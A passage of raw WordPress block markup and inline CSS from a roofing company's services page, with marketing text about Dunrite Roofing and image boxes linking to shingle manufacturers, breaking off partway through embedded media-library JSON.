.skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"5bb0eb53-4142-4c56-a9da-ddac15427577\"} -->\n<style type=\"text/css\"> .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5bb0eb53-4142-4c56-a9da-ddac15427577\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"3bac4046-8d50-4568-a704-3d0a1309220e\"} -->\n<style type=\"text/css\"> .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3bac4046-8d50-4568-a704-3d0a1309220e\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:heading {\"level\":3} -->\n<h3>EXPERIENCE THE DUNRITE DIFFERENCE</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dunrite Roofing has been working hard for three generations to provide you our ultimate goal:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>100% customer satisfaction. Locally owned and operated for 25+ years, contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1e15d182-2fe0-4c40-80ac-07eac231b55f\"} -->\n<style type=\"text/css\"> .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1e15d182-2fe0-4c40-80ac-07eac231b55f skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"11f54df8-ed12-474d-af0a-c624bd1b75bd\"} -->\n<style type=\"text/css\"> .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-11f54df8-ed12-474d-af0a-c624bd1b75bd\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"d2f65cb2-10c7-4a79-b25a-de564d91e1c1\"} -->\n<style type=\"text/css\"> .block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://cteisys.com/home/slider2/\" class=\"wp-image-34\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" data-id=\"440\" data-link=\"https://cteisys.com/recent-works/18033957_1641106155903819_3439710667750671365_n/\" class=\"wp-image-440\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>Never worry again with a new roof replacement from Dunrite. With Mike or Justin on every job you can be sure to receive quality that cannot be beat. Whether it is a residential tear off, new construction or the installation of a metal accent roof take a look at some options below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"You’re Looking For\\u003cbr\\u003eProtection You Deserve\",\"title\":\"Atlas Shingles\",\"cta_url\":\"https://www.atlasroofing.com/roof-shingles\",\"img_id\":484,\"img_url\":{\"id\":484,\"title\":\"atlas roof shingles\",\"filename\":\"atlas-roof-shingles.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/atlas-roof-shingles/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"atlas-roof-shingles\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:39.000Z\",\"modified\":\"2022-08-24T23:19:39.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"f4e29dfaf0\",\"delete\":\"cda8092ac3\",\"edit\":\"4d4ab539cc\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=484\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"16306\",\"filesizeHumanReadable\":\"16 KB\",\"context\":\"\",\"height\":170,\"width\":306,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":167,\"width\":300,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-300x167.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"height\":170,\"width\":306,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e3 images reduced by 21.1 KB (60.7%)\\u003cbr /\\u003eImage size: 15.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-484\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eMEDIUM \\u003cbr /\\u003e (300x167)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.3 KB ( 49.5% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x150)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 64.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.8 KB ( 74.6% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"title\":\"Tamko Products\",\"cta_url\":\"https://www.tamko.com/\",\"hover_description\":\"Shingles crafted with American Pride\",\"img_id\":486,\"img_url\":{\"id\":486,\"title\":\"tamco\",\"filename\":\"tamco.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/tamco/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"tamco\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:57.000Z\",\"modified\":\"2022-08-24T23:19:57.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"6acecdcaed\",\"delete\":\"ba51f566bc\",\"edit\":\"906a5258b4\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=486\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"18355\",\"filesizeHumanReadable\":\"18 KB\",\"context\":\"\",\"height\":129,\"width\":291,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":129,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco-150x129.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"height\":129,\"width\":291,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 13.9 KB (61.0%)\\u003cbr /\\u003eImage size: 17.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-486\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x129)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 55.3% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}}],\"counterId\":\"fc4c35c5-5920-42b0-815e-00e4450fb573\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.atlasroofing.com/roof-shingles\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-fc4c35c5-5920-42b0-815e-00e4450fb573\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Atlas Shingles</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">You’re Looking For<br>Protection You Deserve</p></div></a><a href=\"https://www.tamko.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-fc4c35c5-5920-42b0-815e-00e4450fb573\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Tamko Products</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Shingles crafted with American Pride</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"At Owens Corning, we know it’s More Than Just a Roof®.\",\"title\":\"Owens Corning\",\"cta_url\":\"https://www.owenscorning.com/\",\"img_id\":485,\"img_url\":{\"id\":485,\"title\":\"owens corning\",\"filename\":\"owens-corning.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/owens-corning/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"owens-corning\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:47.000Z\",\"modified\":\"2022-08-24T23:19:47.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"94850a2d2b\",\"delete\":\"df3080b8b1\",\"edit\":\"721340def0\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=485\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"17085\",\"filesizeHumanReadable\":\"17 KB\",\"context\":\"\",\"height\":98,\"width\":297,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":98,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning-150x98.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"height\":98,\"width\":297,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 14.0 KB (62.1%)\\u003cbr /\\u003eImage size: 16.7 KB\\u003c/p\\u003e\\u003cdiv 